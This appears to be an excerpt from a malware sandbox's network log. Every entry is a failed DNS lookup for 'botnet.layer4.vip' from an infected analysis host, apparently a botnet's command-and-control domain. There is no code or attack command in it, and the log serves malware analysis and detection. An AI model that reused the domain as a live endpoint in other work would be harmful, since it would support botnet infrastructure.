                                  Apr 9, 2023 03:31:46.849392891 CEST8.8.8.8192.168.2.230x6c3eName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:46.873788118 CEST8.8.8.8192.168.2.230x6c3eName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:46.889609098 CEST8.8.8.8192.168.2.230x6c3eName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:46.921271086 CEST8.8.8.8192.168.2.230x6c3eName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:46.945682049 CEST8.8.8.8192.168.2.230x3f79Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:47.073760986 CEST8.8.8.8192.168.2.230x3389Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:47.098393917 CEST8.8.8.8192.168.2.230x3389Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:47.113812923 CEST8.8.8.8192.168.2.230x3389Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:47.153935909 CEST8.8.8.8192.168.2.230x6c3cName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:47.178420067 CEST8.8.8.8192.168.2.230x6c3cName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:47.203017950 CEST8.8.8.8192.168.2.230x6c3cName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:47.291960955 CEST8.8.8.8192.168.2.230xac04Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:47.316186905 CEST8.8.8.8192.168.2.230xac04Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:47.364485979 CEST8.8.8.8192.168.2.230xac04Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:47.380500078 CEST8.8.8.8192.168.2.230x19eaName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:47.404997110 CEST8.8.8.8192.168.2.230x19eaName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:47.429536104 CEST8.8.8.8192.168.2.230x19eaName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:47.454169989 CEST8.8.8.8192.168.2.230x19eaName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:47.478595972 CEST8.8.8.8192.168.2.230x19eaName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:47.518507957 CEST8.8.8.8192.168.2.230xc818Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:47.566992044 CEST8.8.8.8192.168.2.230xc818Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:47.591476917 CEST8.8.8.8192.168.2.230xc818Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:47.647352934 CEST8.8.8.8192.168.2.230x4a87Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:47.695456982 CEST8.8.8.8192.168.2.230x4a87Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:47.735404015 CEST8.8.8.8192.168.2.230x7a00Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:47.759476900 CEST8.8.8.8192.168.2.230x7a00Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:47.783556938 CEST8.8.8.8192.168.2.230x7a00Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:47.799196959 CEST8.8.8.8192.168.2.230x7a00Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:47.823648930 CEST8.8.8.8192.168.2.230xe78eName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:47.839193106 CEST8.8.8.8192.168.2.230xe78eName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:47.863543034 CEST8.8.8.8192.168.2.230xe78eName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:47.912069082 CEST8.8.8.8192.168.2.230xe78eName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:47.959925890 CEST8.8.8.8192.168.2.230xe559Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:47.975603104 CEST8.8.8.8192.168.2.230xe559Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:47.999906063 CEST8.8.8.8192.168.2.230xe559Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:48.031596899 CEST8.8.8.8192.168.2.230x6cbbName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:48.055919886 CEST8.8.8.8192.168.2.230x6cbbName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:48.104079962 CEST8.8.8.8192.168.2.230x6cbbName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:48.119729996 CEST8.8.8.8192.168.2.230xd80cName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:48.167881012 CEST8.8.8.8192.168.2.230xd80cName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:48.183681011 CEST8.8.8.8192.168.2.230xd80cName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:48.247874975 CEST8.8.8.8192.168.2.230x8b03Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:48.272300959 CEST8.8.8.8192.168.2.230x8b03Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:48.296947956 CEST8.8.8.8192.168.2.230x8b03Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:48.312851906 CEST8.8.8.8192.168.2.230x8b03Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:48.329360962 CEST8.8.8.8192.168.2.230x8d32Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:48.353569031 CEST8.8.8.8192.168.2.230x8d32Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:48.369134903 CEST8.8.8.8192.168.2.230x8d32Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:48.400921106 CEST8.8.8.8192.168.2.230x8d32Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:48.442007065 CEST8.8.8.8192.168.2.230x544Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:48.466255903 CEST8.8.8.8192.168.2.230x544Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:48.491733074 CEST8.8.8.8192.168.2.230x544Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:48.516325951 CEST8.8.8.8192.168.2.230x544Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:48.548211098 CEST8.8.8.8192.168.2.230x3792Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:48.572788954 CEST8.8.8.8192.168.2.230x3792Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:48.613019943 CEST8.8.8.8192.168.2.230x3792Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:48.656009912 CEST8.8.8.8192.168.2.230xa6aName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:48.681478024 CEST8.8.8.8192.168.2.230xa6aName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:48.713288069 CEST8.8.8.8192.168.2.230xa6aName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:48.753243923 CEST8.8.8.8192.168.2.230x61c5Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:48.784687996 CEST8.8.8.8192.168.2.230x61c5Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:48.808815002 CEST8.8.8.8192.168.2.230x61c5Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:48.833328009 CEST8.8.8.8192.168.2.230xbd0bName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:48.889499903 CEST8.8.8.8192.168.2.230xbd0bName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:48.970063925 CEST8.8.8.8192.168.2.230xb86bName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:49.042453051 CEST8.8.8.8192.168.2.230xc0b4Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:49.091284990 CEST8.8.8.8192.168.2.230xc0b4Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:49.115451097 CEST8.8.8.8192.168.2.230xc0b4Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:49.179841042 CEST8.8.8.8192.168.2.230x26d6Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:49.220424891 CEST8.8.8.8192.168.2.230x26d6Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:49.261099100 CEST8.8.8.8192.168.2.230x59f0Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:49.310841084 CEST8.8.8.8192.168.2.230x59f0Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:49.359828949 CEST8.8.8.8192.168.2.230x3398Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:49.456629992 CEST8.8.8.8192.168.2.230x9accName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:49.496844053 CEST8.8.8.8192.168.2.230x9accName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:49.521286011 CEST8.8.8.8192.168.2.230x9accName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:49.570575953 CEST8.8.8.8192.168.2.230x46acName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:49.586535931 CEST8.8.8.8192.168.2.230x46acName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:49.602631092 CEST8.8.8.8192.168.2.230x46acName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:49.634609938 CEST8.8.8.8192.168.2.230x46acName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:49.650866032 CEST8.8.8.8192.168.2.230x8790Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:49.682535887 CEST8.8.8.8192.168.2.230x8790Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:49.706794977 CEST8.8.8.8192.168.2.230x8790Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:49.735210896 CEST8.8.8.8192.168.2.230x8790Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:49.791260958 CEST8.8.8.8192.168.2.230x678aName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:49.831289053 CEST8.8.8.8192.168.2.230x678aName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:49.847316027 CEST8.8.8.8192.168.2.230x2152Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:49.879401922 CEST8.8.8.8192.168.2.230x2152Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:49.919868946 CEST8.8.8.8192.168.2.230x2152Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:49.944088936 CEST8.8.8.8192.168.2.230x4479Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:49.960611105 CEST8.8.8.8192.168.2.230x4479Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:49.976146936 CEST8.8.8.8192.168.2.230x4479Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:50.056413889 CEST8.8.8.8192.168.2.230x63c4Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:50.080996990 CEST8.8.8.8192.168.2.230x63c4Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:50.129785061 CEST8.8.8.8192.168.2.230x63c4Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:50.154845953 CEST8.8.8.8192.168.2.230xfaa7Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:50.179425955 CEST8.8.8.8192.168.2.230xfaa7Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:50.228101015 CEST8.8.8.8192.168.2.230xfaa7Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:50.260083914 CEST8.8.8.8192.168.2.230xc879Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:50.300564051 CEST8.8.8.8192.168.2.230xc879Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:50.356812000 CEST8.8.8.8192.168.2.230x9755Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:50.396475077 CEST8.8.8.8192.168.2.230x9755Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:50.412194014 CEST8.8.8.8192.168.2.230x9755Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:50.436680079 CEST8.8.8.8192.168.2.230x9755Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:50.452693939 CEST8.8.8.8192.168.2.230xe101Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:50.573911905 CEST8.8.8.8192.168.2.230x43ccName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:50.589858055 CEST8.8.8.8192.168.2.230x43ccName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:50.605573893 CEST8.8.8.8192.168.2.230x43ccName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:50.661648035 CEST8.8.8.8192.168.2.230xbe3bName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:50.693593025 CEST8.8.8.8192.168.2.230xbe3bName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:50.718245029 CEST8.8.8.8192.168.2.230xbe3bName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:50.742961884 CEST8.8.8.8192.168.2.230x77e2Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:50.808018923 CEST8.8.8.8192.168.2.230x77e2Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:50.933468103 CEST8.8.8.8192.168.2.230xefeName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:50.998526096 CEST8.8.8.8192.168.2.230x9bacName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:51.014302969 CEST8.8.8.8192.168.2.230x9bacName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:51.038753033 CEST8.8.8.8192.168.2.230x9bacName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:51.063335896 CEST8.8.8.8192.168.2.230x1ca7Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:51.079225063 CEST8.8.8.8192.168.2.230x1ca7Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:51.103657961 CEST8.8.8.8192.168.2.230x1ca7Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:51.160640001 CEST8.8.8.8192.168.2.230x1c56Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:51.185836077 CEST8.8.8.8192.168.2.230x1c56Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:51.201370001 CEST8.8.8.8192.168.2.230x1c56Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:51.225507975 CEST8.8.8.8192.168.2.230x1c56Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:51.257050037 CEST8.8.8.8192.168.2.230x436fName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:51.281402111 CEST8.8.8.8192.168.2.230x436fName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:51.305828094 CEST8.8.8.8192.168.2.230x436fName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:51.337266922 CEST8.8.8.8192.168.2.230x436fName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:51.377322912 CEST8.8.8.8192.168.2.230xe4deName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:51.417264938 CEST8.8.8.8192.168.2.230xe4deName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:51.449177027 CEST8.8.8.8192.168.2.230x238aName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:51.473584890 CEST8.8.8.8192.168.2.230x238aName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:51.529767990 CEST8.8.8.8192.168.2.230x238aName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:51.545494080 CEST8.8.8.8192.168.2.230x490cName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:51.601114035 CEST8.8.8.8192.168.2.230x490cName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:51.625171900 CEST8.8.8.8192.168.2.230x490cName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:51.698488951 CEST8.8.8.8192.168.2.230x326aName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:51.714802980 CEST8.8.8.8192.168.2.230x326aName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:51.795783043 CEST8.8.8.8192.168.2.230x61f5Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:51.835707903 CEST8.8.8.8192.168.2.230x61f5Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:51.851345062 CEST8.8.8.8192.168.2.230xe3ccName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:51.875727892 CEST8.8.8.8192.168.2.230xe3ccName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:51.915931940 CEST8.8.8.8192.168.2.230xe3ccName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:51.932102919 CEST8.8.8.8192.168.2.230xe3ccName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:52.103508949 CEST8.8.8.8192.168.2.230x2856Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:52.119220972 CEST8.8.8.8192.168.2.230x2856Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:52.184184074 CEST8.8.8.8192.168.2.230xe2cdName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:52.208344936 CEST8.8.8.8192.168.2.230xe2cdName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:52.280148029 CEST8.8.8.8192.168.2.230xf8d1Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:52.307486057 CEST8.8.8.8192.168.2.230xf8d1Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:52.323036909 CEST8.8.8.8192.168.2.230xf8d1Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:52.363486052 CEST8.8.8.8192.168.2.230x2cf0Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:52.395232916 CEST8.8.8.8192.168.2.230x2cf0Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:52.411128044 CEST8.8.8.8192.168.2.230x2cf0Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:52.426753998 CEST8.8.8.8192.168.2.230x2cf0Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:52.451590061 CEST8.8.8.8192.168.2.230x5292Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:52.499948025 CEST8.8.8.8192.168.2.230x5292Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:52.540237904 CEST8.8.8.8192.168.2.230x5292Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:52.565323114 CEST8.8.8.8192.168.2.230x3bf4Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:52.590003967 CEST8.8.8.8192.168.2.230x3bf4Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:52.614209890 CEST8.8.8.8192.168.2.230x3bf4Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:52.678941965 CEST8.8.8.8192.168.2.230xeaa9Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:52.694925070 CEST8.8.8.8192.168.2.230xeaa9Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:52.711981058 CEST8.8.8.8192.168.2.230xeaa9Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:52.736129999 CEST8.8.8.8192.168.2.230xeaa9Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:52.786214113 CEST8.8.8.8192.168.2.230xba96Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:52.802078962 CEST8.8.8.8192.168.2.230xba96Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:52.844980955 CEST8.8.8.8192.168.2.230xba96Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:52.886315107 CEST8.8.8.8192.168.2.230xa40bName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:52.903131008 CEST8.8.8.8192.168.2.230xa40bName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:52.986861944 CEST8.8.8.8192.168.2.230xcfa5Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:53.053981066 CEST8.8.8.8192.168.2.230xcfa5Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:53.127408981 CEST8.8.8.8192.168.2.230xc75bName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:53.143099070 CEST8.8.8.8192.168.2.230xc75bName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:53.183722019 CEST8.8.8.8192.168.2.230xc75bName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:53.199444056 CEST8.8.8.8192.168.2.230x3f04Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:53.215143919 CEST8.8.8.8192.168.2.230x3f04Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:53.230794907 CEST8.8.8.8192.168.2.230x3f04Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:53.279221058 CEST8.8.8.8192.168.2.230x3f04Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:53.303828001 CEST8.8.8.8192.168.2.230x4777Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:53.352281094 CEST8.8.8.8192.168.2.230x4777Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:53.376799107 CEST8.8.8.8192.168.2.230x4777Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:53.441500902 CEST8.8.8.8192.168.2.230x6648Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:53.490161896 CEST8.8.8.8192.168.2.230x6648Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:53.506118059 CEST8.8.8.8192.168.2.230x8255Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:53.546495914 CEST8.8.8.8192.168.2.230x8255Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
